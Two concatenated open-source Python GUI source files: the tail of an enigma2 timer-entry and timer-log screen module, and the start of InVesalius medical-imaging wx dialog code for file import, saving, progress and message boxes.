return self["config"].getCurrent() and str(self["config"].getCurrent()[1].getText()) or ""
def newConfig(self):
if self["config"].getCurrent() in (self.timerTypeEntry, self.timerJustplayEntry, self.frequencyEntry, self.entryShowEndTime):
self.createSetup("config")
def KeyText(self):
if self['config'].getCurrent()[0] in (_('Name'), _("Description")):
self.session.openWithCallback(self.renameEntryCallback, VirtualKeyBoard, title=self["config"].getCurrent()[2], text = self["config"].getCurrent()[1].value)
def keyLeft(self):
cur = self["config"].getCurrent()
if cur in (self.channelEntry, self.tagsSet):
self.keySelect()
elif cur in (self.entryName, self.entryDescription):
self.renameEntry()
else:
ConfigListScreen.keyLeft(self)
self.newConfig()
def keyRight(self):
cur = self["config"].getCurrent()
if cur in (self.channelEntry, self.tagsSet):
self.keySelect()
elif cur in (self.entryName, self.entryDescription):
self.renameEntry()
else:
ConfigListScreen.keyRight(self)
self.newConfig()
def renameEntry(self):
cur = self["config"].getCurrent()
if cur == self.entryName:
title_text = _("Please enter new name:")
old_text = self.timerentry_name.value
else:
title_text = _("Please enter new description:")
old_text = self.timerentry_description.value
self.session.openWithCallback(self.renameEntryCallback, VirtualKeyBoard, title=title_text, text=old_text)
def renameEntryCallback(self, answer):
if answer:
if self["config"].getCurrent() == self.entryName:
self.timerentry_name.value = answer
self["config"].invalidate(self.entryName)
else:
self.timerentry_description.value = answer
self["config"].invalidate(self.entryDescription)
def handleKeyFileCallback(self, answer):
if self["config"].getCurrent() in (self.channelEntry, self.tagsSet):
self.keySelect()
else:
ConfigListScreen.handleKeyFileCallback(self, answer)
self.newConfig()
def keySelect(self):
cur = self["config"].getCurrent()
if cur == self.channelEntry:
self.session.openWithCallback(
self.finishedChannelSelection,
ChannelSelection.SimpleChannelSelection,
_("Select channel to record from"),
currentBouquet=True
)
elif config.usage.setup_level.index >= 2 and cur == self.dirname:
self.session.openWithCallback(
self.pathSelected,
MovieLocationBox,
_("Select target folder"),
self.timerentry_dirname.value,
minFree = 100 # We require at least 100MB free space
)
elif getPreferredTagEditor() and cur == self.tagsSet:
self.session.openWithCallback(
self.tagEditFinished,
getPreferredTagEditor(),
self.timerentry_tags
)
else:
self.keyGo()
def finishedChannelSelection(self, *args):
if args:
self.timerentry_service_ref = ServiceReference(args[0])
self.timerentry_service.setCurrentText(self.timerentry_service_ref.getServiceName())
self["config"].invalidate(self.channelEntry)
def getTimestamp(self, date, mytime):
d = localtime(date)
dt = datetime(d.tm_year, d.tm_mon, d.tm_mday, mytime[0], mytime[1])
return int(mktime(dt.timetuple()))
def getBeginEnd(self):
date = self.timerentry_date.value
endtime = self.timerentry_endtime.value
starttime = self.timerentry_starttime.value
begin = self.getTimestamp(date, starttime)
end = self.getTimestamp(date, endtime)
# if the endtime is less than the starttime, add 1 day.
if end < begin:
end += 86400
# if the timer type is a Zap and no end is set, set duration to 1 second so time is shown in EPG's.
if self.timerentry_justplay.value == "zap":
if not self.timerentry_showendtime.value:
end = begin + (config.recording.margin_before.value*60) + 1
return begin, end
def selectChannelSelector(self, *args):
self.session.openWithCallback(
self.finishedChannelSelectionCorrection,
ChannelSelection.SimpleChannelSelection,
_("Select channel to record from")
)
def finishedChannelSelectionCorrection(self, *args):
if args:
self.finishedChannelSelection(*args)
self.keyGo()
def keyGo(self, result = None):
if not self.timerentry_service_ref.isRecordable():
self.session.openWithCallback(self.selectChannelSelector, MessageBox, _("You didn't select a channel to record from."), MessageBox.TYPE_ERROR)
return
self.timer.name = self.timerentry_name.value
self.timer.description = self.timerentry_description.value
self.timer.justplay = self.timerentry_justplay.value == "zap"
self.timer.always_zap = self.timerentry_justplay.value == "zap+record"
self.timer.rename_repeat = self.timerentry_renamerepeat.value
if self.timerentry_justplay.value == "zap":
if not self.timerentry_showendtime.value:
self.timerentry_endtime.value = self.timerentry_starttime.value
self.timer.resetRepeated()
self.timer.afterEvent = {
"nothing": AFTEREVENT.NONE,
"deepstandby": AFTEREVENT.DEEPSTANDBY,
"standby": AFTEREVENT.STANDBY,
"auto": AFTEREVENT.AUTO
}[self.timerentry_afterevent.value]
self.timer.descramble = {
"normal": True,
"descrambled+ecm": True,
"scrambled+ecm": False,
}[self.timerentry_recordingtype.value]
self.timer.record_ecm = {
"normal": False,
"descrambled+ecm": True,
"scrambled+ecm": True,
}[self.timerentry_recordingtype.value]
self.timer.service_ref = self.timerentry_service_ref
self.timer.tags = self.timerentry_tags
if self.timer.dirname or self.timerentry_dirname.value != defaultMoviePath():
self.timer.dirname = self.timerentry_dirname.value
config.movielist.last_timer_videodir.value = self.timer.dirname
config.movielist.last_timer_videodir.save()
if self.timerentry_type.value == "once":
self.timer.begin, self.timer.end = self.getBeginEnd()
if self.timerentry_type.value == "repeated":
if self.timerentry_repeated.value == "daily":
for x in (0, 1, 2, 3, 4, 5, 6):
self.timer.setRepeated(x)
if self.timerentry_repeated.value == "weekly":
self.timer.setRepeated(self.timerentry_weekday.index)
if self.timerentry_repeated.value == "weekdays":
for x in (0, 1, 2, 3, 4):
self.timer.setRepeated(x)
if self.timerentry_repeated.value == "user":
for x in (0, 1, 2, 3, 4, 5, 6):
if self.timerentry_day[x].value:
self.timer.setRepeated(x)
self.timer.repeatedbegindate = self.getTimestamp(self.timerentry_repeatedbegindate.value, self.timerentry_starttime.value)
if self.timer.repeated:
self.timer.begin = self.getTimestamp(self.timerentry_repeatedbegindate.value, self.timerentry_starttime.value)
self.timer.end = self.getTimestamp(self.timerentry_repeatedbegindate.value, self.timerentry_endtime.value)
else:
self.timer.begin = self.getTimestamp(time.time(), self.timerentry_starttime.value)
self.timer.end = self.getTimestamp(time.time(), self.timerentry_endtime.value)
# when a timer end is set before the start, add 1 day
if self.timer.end < self.timer.begin:
self.timer.end += 86400
if self.timer.eit is not None:
event = eEPGCache.getInstance().lookupEventId(self.timer.service_ref.ref, self.timer.eit)
if event:
n = event.getNumOfLinkageServices()
if n > 1:
tlist = []
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
parent = self.timer.service_ref.ref
selection = 0
for x in range(n):
i = event.getLinkageService(parent, x)
if i.toString() == ref.toString():
selection = x
tlist.append((i.getName(), i))
self.session.openWithCallback(self.subserviceSelected, ChoiceBox, title=_("Please select a subservice to record..."), list = tlist, selection = selection)
return
elif n > 0:
parent = self.timer.service_ref.ref
self.timer.service_ref = ServiceReference(event.getLinkageService(parent, 0))
self.saveTimer()
self.close((True, self.timer))
def changeTimerType(self):
self.timerentry_justplay.selectNext()
self.timerJustplayEntry = getConfigListEntry(_("Timer type"), self.timerentry_justplay)
self["config"].invalidate(self.timerJustplayEntry)
def incrementStart(self):
self.timerentry_starttime.increment()
self["config"].invalidate(self.entryStartTime)
if self.timerentry_type.value == "once" and self.timerentry_starttime.value == [0, 0]:
self.timerentry_date.value += 86400
self["config"].invalidate(self.entryDate)
def decrementStart(self):
self.timerentry_starttime.decrement()
self["config"].invalidate(self.entryStartTime)
if self.timerentry_type.value == "once" and self.timerentry_starttime.value == [23, 59]:
self.timerentry_date.value -= 86400
self["config"].invalidate(self.entryDate)
def incrementEnd(self):
if self.entryEndTime is not None:
self.timerentry_endtime.increment()
self["config"].invalidate(self.entryEndTime)
def decrementEnd(self):
if self.entryEndTime is not None:
self.timerentry_endtime.decrement()
self["config"].invalidate(self.entryEndTime)
def subserviceSelected(self, service):
if not service is None:
self.timer.service_ref = ServiceReference(service[1])
self.saveTimer()
self.close((True, self.timer))
def saveTimer(self):
self.session.nav.RecordTimer.saveTimer()
def keyCancel(self):
self.close((False,))
def pathSelected(self, res):
if res is not None:
if config.movielist.videodirs.value != self.timerentry_dirname.choices:
self.timerentry_dirname.setChoices(config.movielist.videodirs.value, default=res)
self.timerentry_dirname.value = res
def tagEditFinished(self, ret):
if ret is not None:
self.timerentry_tags = ret
self.timerentry_tagsset.setChoices([not ret and "None" or " ".join(ret)])
self["config"].invalidate(self.tagsSet)
class TimerLog(Screen):
def __init__(self, session, timer):
Screen.__init__(self, session)
self.timer = timer
self.log_entries = self.timer.log_entries[:]
self.fillLogList()
self["loglist"] = MenuList(self.list)
self["logentry"] = Label()
self["key_red"] = Button(_("Delete entry"))
self["key_green"] = Button()
self["key_blue"] = Button(_("Clear log"))
self.onShown.append(self.updateText)
self["actions"] = NumberActionMap(["OkCancelActions", "DirectionActions", "ColorActions"],
{
"ok": self.keyClose,
"cancel": self.keyClose,
"up": self.up,
"down": self.down,
"left": self.left,
"right": self.right,
"red": self.deleteEntry,
"blue": self.clearLog
}, -1)
self.setTitle(_("Timer log"))
def deleteEntry(self):
cur = self["loglist"].getCurrent()
if cur is None:
return
self.log_entries.remove(cur[1])
self.fillLogList()
self["loglist"].l.setList(self.list)
self.updateText()
def fillLogList(self):
self.list = [(str(strftime("%Y-%m-%d %H-%M", localtime(x[0])) + " - " + x[2]), x) for x in self.log_entries]
def clearLog(self):
self.log_entries = []
self.fillLogList()
self["loglist"].l.setList(self.list)
self.updateText()
def keyClose(self):
if self.timer.log_entries != self.log_entries:
self.timer.log_entries = self.log_entries
self.close((True, self.timer))
else:
self.close((False,))
def up(self):
self["loglist"].instance.moveSelection(self["loglist"].instance.moveUp)
self.updateText()
def down(self):
self["loglist"].instance.moveSelection(self["loglist"].instance.moveDown)
self.updateText()
def left(self):
self["loglist"].instance.moveSelection(self["loglist"].instance.pageUp)
self.updateText()
def right(self):
self["loglist"].instance.moveSelection(self["loglist"].instance.pageDown)
self.updateText()
def updateText(self):
if self.list:
self["logentry"].setText(str(self["loglist"].getCurrent()[1][2]))
else:
self["logentry"].setText("")
class InstantRecordTimerEntry(TimerEntry):
def __init__(self, session, timer, zap):
Screen.__init__(self, session)
self.setup_title = ""
self.timer = timer
self.timer.justplay = zap
self.entryDate = None
self.entryService = None
self.keyGo()
def keyGo(self, result = None):
if self.timer.justplay:
self.timer.end = self.timer.begin + (config.recording.margin_before.value * 60) + 1
self.timer.resetRepeated()
self.saveTimer()
def retval(self):
return self.timer
def saveTimer(self):
self.session.nav.RecordTimer.saveTimer()
| mrnamingo/vix4-34-enigma2-bcm | lib/python/Screens/TimerEntry.py | Python | gpl-2.0 | 25,002 |
# -*- coding: UTF-8 -*-
#--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import itertools
import os
import random
import sys
import time
from functools import partial
from concurrent import futures
if sys.platform == 'win32':
try:
import win32api
_has_win32api = True
except ImportError:
_has_win32api = False
else:
_has_win32api = False
import vtk
import wx
try:
from wx.adv import BitmapComboBox
except ImportError:
from wx.combo import BitmapComboBox
from vtk.wx.wxVTKRenderWindowInteractor import wxVTKRenderWindowInteractor
from wx.lib import masked
from wx.lib.agw import floatspin
import wx.lib.filebrowsebutton as filebrowse
from wx.lib.wordwrap import wordwrap
from invesalius.pubsub import pub as Publisher
import csv
try:
from wx.adv import AboutDialogInfo, AboutBox
except ImportError:
from wx import AboutDialogInfo, AboutBox
import invesalius.constants as const
import invesalius.data.coordinates as dco
import invesalius.data.transformations as tr
import invesalius.gui.widgets.gradient as grad
import invesalius.session as ses
import invesalius.utils as utils
import invesalius.data.vtk_utils as vtku
import invesalius.data.coregistration as dcr
from invesalius.gui.widgets.inv_spinctrl import InvSpinCtrl, InvFloatSpinCtrl
from invesalius.gui.widgets import clut_imagedata
from invesalius.gui.widgets.clut_imagedata import CLUTImageDataWidget, EVT_CLUT_NODE_CHANGED
import numpy as np
from numpy.core.umath_tests import inner1d
from invesalius import inv_paths
try:
from agw import floatspin as FS
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.floatspin as FS
class MaskEvent(wx.PyCommandEvent):
def __init__(self , evtType, id, mask_index):
wx.PyCommandEvent.__init__(self, evtType, id,)
self.mask_index = mask_index
myEVT_MASK_SET = wx.NewEventType()
EVT_MASK_SET = wx.PyEventBinder(myEVT_MASK_SET, 1)
class NumberDialog(wx.Dialog):
def __init__(self, message, value=0):
wx.Dialog.__init__(self, None, -1, "InVesalius 3", size=wx.DefaultSize,
pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE)
# Static text which contains message to user
label = wx.StaticText(self, -1, message)
# Numeric value to be changed by user
num_ctrl = masked.NumCtrl(self, value=value, integerWidth=3,
fractionWidth=2,
allowNegative=True,
signedForegroundColour = "Black")
self.num_ctrl = num_ctrl
# Buttons
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText(_("Value will be applied."))
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText(_("Value will not be applied."))
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(num_ctrl, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(btnsizer, 0, wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Centre()
def SetValue(self, value):
self.num_ctrl.SetValue(value)
def GetValue(self):
return self.num_ctrl.GetValue()
class ResizeImageDialog(wx.Dialog):
def __init__(self):#, message, value=0):
wx.Dialog.__init__(self, None, -1, "InVesalius 3", size=wx.DefaultSize,
pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE)
lbl_message = wx.StaticText(self, -1, _("InVesalius is running on a 32-bit operating system or has insufficient memory. \nIf you want to work with 3D surfaces or volume rendering, \nit is recommended to reduce the medical images resolution."))
icon = wx.ArtProvider.GetBitmap(wx.ART_WARNING, wx.ART_MESSAGE_BOX, (32,32))
bmp = wx.StaticBitmap(self, -1, icon)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_sizer = wx.StdDialogButtonSizer()
btn_sizer.AddButton(btn_ok)
btn_sizer.AddButton(btn_cancel)
btn_sizer.Realize()
lbl_message_percent = wx.StaticText(self, -1,_("Percentage of original resolution"))
num_ctrl_percent = InvSpinCtrl(self, -1, value=100, min_value=20, max_value=100)
self.num_ctrl_porcent = num_ctrl_percent
sizer_percent = wx.BoxSizer(wx.HORIZONTAL)
sizer_percent.Add(lbl_message_percent, 0, wx.EXPAND|wx.ALL, 5)
sizer_percent.Add(num_ctrl_percent, 0, wx.ALL, 5)
sizer_itens = wx.BoxSizer(wx.VERTICAL)
sizer_itens.Add(lbl_message, 0, wx.EXPAND|wx.ALL, 5)
sizer_itens.Add(sizer_percent, 0, wx.EXPAND|wx.ALL, 5)
sizer_itens.Add(btn_sizer, 0, wx.EXPAND|wx.ALL, 5)
sizer_general = wx.BoxSizer(wx.HORIZONTAL)
sizer_general.Add(bmp, 0, wx.ALIGN_CENTRE|wx.ALL, 10)
sizer_general.Add(sizer_itens, 0, wx.ALL , 5)
#self.SetAutoLayout(True)
self.SetSizer(sizer_general)
sizer_general.Fit(self)
self.Layout()
self.Centre()
def SetValue(self, value):
self.num_ctrl_porcent.SetValue(value)
def GetValue(self):
return self.num_ctrl_porcent.GetValue()
def Close(self):
self.Destroy()
def ShowNumberDialog(message, value=0):
dlg = NumberDialog(message, value)
dlg.SetValue(value)
if dlg.ShowModal() == wx.ID_OK:
return dlg.GetValue()
dlg.Destroy()
return 0
class ProgressDialog(object):
def __init__(self, parent, maximum, abort=False):
self.title = "InVesalius 3"
self.msg = _("Loading DICOM files")
self.maximum = maximum
self.current = 0
self.style = wx.PD_APP_MODAL
if abort:
self.style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT
self.dlg = wx.ProgressDialog(self.title,
self.msg,
maximum = self.maximum,
parent = parent,
style = self.style)
self.dlg.Bind(wx.EVT_BUTTON, self.Cancel)
self.dlg.SetSize(wx.Size(250,150))
def Cancel(self, evt):
Publisher.sendMessage("Cancel DICOM load")
def Update(self, value, message):
if(int(value) != self.maximum):
try:
return self.dlg.Update(value,message)
#TODO:
#Exception in the Windows XP 64 Bits with wxPython 2.8.10
except(wx._core.PyAssertionError):
return True
else:
return False
def Close(self):
self.dlg.Destroy()
# ---------
INV_NON_COMPRESSED = 0
INV_COMPRESSED = 1
WILDCARD_INV_SAVE = _("InVesalius project (*.inv3)|*.inv3") + "|" + \
_("InVesalius project compressed (*.inv3)|*.inv3")
WILDCARD_OPEN = "InVesalius 3 project (*.inv3)|*.inv3|" \
"All files (*.*)|*.*"
WILDCARD_ANALYZE = "Analyze 7.5 (*.hdr)|*.hdr|" \
"All files (*.*)|*.*"
WILDCARD_NIFTI = "NIfTI 1 (*.nii;*.nii.gz;*.hdr)|*.nii;*.nii.gz;*.hdr|" \
"All files (*.*)|*.*"
#".[jJ][pP][gG]"
WILDCARD_PARREC = "PAR/REC (*.par)|*.par|" \
"All files (*.*)|*.*"
WILDCARD_MESH_FILES = "STL File format (*.stl)|*.stl|" \
"Standard Polygon File Format (*.ply)|*.ply|" \
"Alias Wavefront Object (*.obj)|*.obj|" \
"VTK Polydata File Format (*.vtp)|*.vtp|" \
"All files (*.*)|*.*"
def ShowOpenProjectDialog():
# Default system path
current_dir = os.path.abspath(".")
session = ses.Session()
last_directory = session.get('paths', 'last_directory_inv3', '')
dlg = wx.FileDialog(None, message=_("Open InVesalius 3 project..."),
defaultDir=last_directory,
defaultFile="", wildcard=WILDCARD_OPEN,
style=wx.FD_OPEN|wx.FD_CHANGE_DIR)
# inv3 filter is default
dlg.SetFilterIndex(0)
# Show the dialog and retrieve the user response. If it is the OK response,
# process the data.
filepath = None
try:
if dlg.ShowModal() == wx.ID_OK:
# This returns a Python list of files that were selected.
filepath = dlg.GetPath()
except(wx._core.PyAssertionError): # FIX: win64
filepath = dlg.GetPath()
if filepath:
session['paths']['last_directory_inv3'] = os.path.split(filepath)[0]
session.WriteSessionFile()
# Destroy the dialog. Don't do this until you are done with it!
# BAD things can happen otherwise!
dlg.Destroy()
os.chdir(current_dir)
return filepath
def ShowImportDirDialog(self):
current_dir = os.path.abspath(".")
if sys.platform == 'win32' or sys.platform.startswith('linux'):
session = ses.Session()
if (session.GetLastDicomFolder()):
folder = session.GetLastDicomFolder()
else:
folder = ''
else:
folder = ''
dlg = wx.DirDialog(self, _("Choose a DICOM folder:"), folder,
style=wx.DD_DEFAULT_STYLE
| wx.DD_DIR_MUST_EXIST
| wx.DD_CHANGE_DIR)
path = None
try:
if dlg.ShowModal() == wx.ID_OK:
# GetPath returns in unicode, if a path has non-ascii characters a
# UnicodeEncodeError is raised. To avoid this, path is encoded in utf-8
if sys.platform == "win32":
path = dlg.GetPath()
else:
path = dlg.GetPath().encode('utf-8')
except(wx._core.PyAssertionError): #TODO: error win64
if (dlg.GetPath()):
path = dlg.GetPath()
if (sys.platform != 'darwin'):
if (path):
session.SetLastDicomFolder(path)
# Only destroy a dialog after you're done with it.
dlg.Destroy()
os.chdir(current_dir)
return path
def ShowImportBitmapDirDialog(self):
current_dir = os.path.abspath(".")
# if sys.platform == 'win32' or sys.platform.startswith('linux'):
# session = ses.Session()
# if (session.GetLastDicomFolder()):
# folder = session.GetLastDicomFolder()
# else:
# folder = ''
# else:
# folder = ''
session = ses.Session()
last_directory = session.get('paths', 'last_directory_bitmap', '')
dlg = wx.DirDialog(self, _("Choose a folder with TIFF, BMP, JPG or PNG:"), last_directory,
style=wx.DD_DEFAULT_STYLE
| wx.DD_DIR_MUST_EXIST
| wx.DD_CHANGE_DIR)
path = None
try:
if dlg.ShowModal() == wx.ID_OK:
# GetPath returns in unicode, if a path has non-ascii characters a
# UnicodeEncodeError is raised. To avoid this, path is encoded in utf-8
path = dlg.GetPath()
except(wx._core.PyAssertionError): #TODO: error win64
if (dlg.GetPath()):
path = dlg.GetPath()
# if (sys.platform != 'darwin'):
# if (path):
# session.SetLastDicomFolder(path)
if path:
session['paths']['last_directory_bitmap'] = path
session.WriteSessionFile()
# Only destroy a dialog after you're done with it.
dlg.Destroy()
os.chdir(current_dir)
return path
def ShowImportOtherFilesDialog(id_type, msg='Import NIFTi 1 file'):
# Default system path
session = ses.Session()
last_directory = session.get('paths', 'last_directory_%d' % id_type, '')
dlg = wx.FileDialog(None, message=msg, defaultDir=last_directory,
defaultFile="", wildcard=WILDCARD_NIFTI,
style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
# if id_type == const.ID_NIFTI_IMPORT:
# dlg.SetMessage(_("Import NIFTi 1 file"))
# dlg.SetWildcard(WILDCARD_NIFTI)
# elif id_type == const.ID_TREKKER_MASK:
# dlg.SetMessage(_("Import Trekker mask"))
# dlg.SetWildcard(WILDCARD_NIFTI)
# elif id_type == const.ID_TREKKER_IMG:
# dlg.SetMessage(_("Import Trekker anatomical image"))
# dlg.SetWildcard(WILDCARD_NIFTI)
# elif id_type == const.ID_TREKKER_FOD:
# dlg.SetMessage(_("Import Trekker FOD"))
# dlg.SetWildcard(WILDCARD_NIFTI)
# elif id_type == const.ID_TREKKER_ACT:
# dlg.SetMessage(_("Import acantomical labels"))
# dlg.SetWildcard(WILDCARD_NIFTI)
if id_type == const.ID_PARREC_IMPORT:
dlg.SetMessage(_("Import PAR/REC file"))
dlg.SetWildcard(WILDCARD_PARREC)
elif id_type == const.ID_ANALYZE_IMPORT:
dlg.SetMessage(_("Import Analyze 7.5 file"))
dlg.SetWildcard(WILDCARD_ANALYZE)
# inv3 filter is default
dlg.SetFilterIndex(0)
# Show the dialog and retrieve the user response. If it is the OK response,
# process the data.
filename = None
try:
if dlg.ShowModal() == wx.ID_OK:
# GetPath returns in unicode, if a path has non-ascii characters a
# UnicodeEncodeError is raised. To avoid this, path is encoded in utf-8
if sys.platform == "win32":
filename = dlg.GetPath()
else:
filename = dlg.GetPath().encode('utf-8')
except(wx._core.PyAssertionError): # TODO: error win64
if (dlg.GetPath()):
filename = dlg.GetPath()
if filename:
session['paths']['last_directory_%d' % id_type] = os.path.split(dlg.GetPath())[0]
session.WriteSessionFile()
# Destroy the dialog. Don't do this until you are done with it!
# BAD things can happen otherwise!
dlg.Destroy()
return filename
def ShowImportMeshFilesDialog():
# Default system path
current_dir = os.path.abspath(".")
session = ses.Session()
last_directory = session.get('paths', 'last_directory_surface_import', '')
dlg = wx.FileDialog(None, message=_("Import surface file"),
defaultDir=last_directory,
wildcard=WILDCARD_MESH_FILES,
style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
# stl filter is default
dlg.SetFilterIndex(0)
# Show the dialog and retrieve the user response. If it is the OK response,
# process the data.
filename = None
try:
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetPath()
except(wx._core.PyAssertionError): # TODO: error win64
if (dlg.GetPath()):
filename = dlg.GetPath()
if filename:
session['paths']['last_directory_surface_import'] = os.path.split(filename)[0]
session.WriteSessionFile()
# Destroy the dialog. Don't do this until you are done with it!
# BAD things can happen otherwise!
dlg.Destroy()
os.chdir(current_dir)
return filename
def ImportMeshCoordSystem():
msg = _("Was the imported mesh created by InVesalius?")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.YES_NO)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.YES_NO)
if dlg.ShowModal() == wx.ID_YES:
flag = False
else:
flag = True
dlg.Destroy()
return flag
def ShowSaveAsProjectDialog(default_filename=None):
current_dir = os.path.abspath(".")
session = ses.Session()
last_directory = session.get('paths', 'last_directory_inv3', '')
dlg = wx.FileDialog(None,
_("Save project as..."), # title
last_directory, # last used directory
default_filename,
WILDCARD_INV_SAVE,
wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)
#dlg.SetFilterIndex(0) # default is VTI
filename = None
try:
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetPath()
ok = 1
else:
ok = 0
except(wx._core.PyAssertionError): #TODO: fix win64
filename = dlg.GetPath()
ok = 1
if (ok):
extension = "inv3"
if sys.platform != 'win32':
if filename.split(".")[-1] != extension:
filename = filename + "." + extension
if filename:
session['paths']['last_directory_inv3'] = os.path.split(filename)[0]
session.WriteSessionFile()
wildcard = dlg.GetFilterIndex()
os.chdir(current_dir)
return filename, wildcard == INV_COMPRESSED
def ShowLoadSaveDialog(message=_(u"Load File"), current_dir=os.path.abspath("."), style=wx.FD_OPEN | wx.FD_CHANGE_DIR,
wildcard=_("Registration files (*.obr)|*.obr"), default_filename="", save_ext=None):
dlg = wx.FileDialog(None, message=message, defaultDir="", defaultFile=default_filename,
wildcard=wildcard, style=style)
# Show the dialog and retrieve the user response. If it is the OK response,
# process the data.
filepath = None
try:
if dlg.ShowModal() == wx.ID_OK:
# This returns a Python list of files that were selected.
filepath = dlg.GetPath()
ok_press = 1
else:
ok_press = 0
except(wx._core.PyAssertionError): # FIX: win64
filepath = dlg.GetPath()
ok_press = 1
# fix the extension if set different than expected
if save_ext and ok_press:
extension = save_ext
if sys.platform != 'win32':
if filepath.split(".")[-1] != extension:
filepath = filepath + "." + extension
# Destroy the dialog. Don't do this until you are done with it!
# BAD things can happen otherwise!
dlg.Destroy()
os.chdir(current_dir)
return filepath
class MessageDialog(wx.Dialog):
def __init__(self, message):
wx.Dialog.__init__(self, None, -1, "InVesalius 3", size=(360, 370), pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE|wx.ICON_INFORMATION)
# Static text which contains message to user
label = wx.StaticText(self, -1, message)
# Buttons
btn_yes = wx.Button(self, wx.ID_YES)
btn_yes.SetHelpText("")
btn_yes.SetDefault()
btn_no = wx.Button(self, wx.ID_NO)
btn_no.SetHelpText("")
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_yes)
btnsizer.AddButton(btn_cancel)
btnsizer.AddButton(btn_no)
btnsizer.Realize()
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|
wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Centre()
class UpdateMessageDialog(wx.Dialog):
def __init__(self, url):
msg=_("A new version of InVesalius is available. Do you want to open the download website now?")
title=_("Invesalius Update")
self.url = url
wx.Dialog.__init__(self, None, -1, title, size=(360, 370), pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE|wx.ICON_INFORMATION)
# Static text which contains message to user
label = wx.StaticText(self, -1, msg)
# Buttons
btn_yes = wx.Button(self, wx.ID_YES)
btn_yes.SetHelpText("")
btn_yes.SetDefault()
btn_no = wx.Button(self, wx.ID_NO)
btn_no.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_yes)
btnsizer.AddButton(btn_no)
btnsizer.Realize()
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|
wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Centre()
btn_yes.Bind(wx.EVT_BUTTON, self._OnYes)
btn_no.Bind(wx.EVT_BUTTON, self._OnNo)
# Subscribing to the pubsub event which happens when InVesalius is
# closed.
Publisher.subscribe(self._OnCloseInV, 'Exit')
def _OnYes(self, evt):
# Launches the default browser with the url to download the new
# InVesalius version.
wx.LaunchDefaultBrowser(self.url)
self.Close()
self.Destroy()
def _OnNo(self, evt):
# Closes and destroy this dialog.
self.Close()
self.Destroy()
def _OnCloseInV(self):
# Closes and destroy this dialog.
self.Close()
self.Destroy()
class MessageBox(wx.Dialog):
def __init__(self, parent, title, message, caption="InVesalius3 Error"):
wx.Dialog.__init__(self, parent, title=caption, style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
title_label = wx.StaticText(self, -1, title)
text = wx.TextCtrl(self, style=wx.TE_MULTILINE|wx.TE_READONLY|wx.BORDER_NONE)
text.SetValue(message)
text.SetBackgroundColour(wx.SystemSettings.GetColour(4))
width, height = text.GetTextExtent("O"*30)
text.SetMinSize((width, -1))
btn_ok = wx.Button(self, wx.ID_OK)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.Realize()
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(title_label, 0, wx.ALL | wx.EXPAND, 5)
sizer.Add(text, 1, wx.ALL | wx.EXPAND, 5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|wx.EXPAND|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Center()
self.ShowModal()
class ErrorMessageBox(wx.Dialog):
def __init__(self, parent, title, message, caption="InVesalius3 Error"):
wx.Dialog.__init__(self, parent, title=caption, style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
title_label = wx.StaticText(self, -1, title)
title_width, title_height = title_label.GetSize()
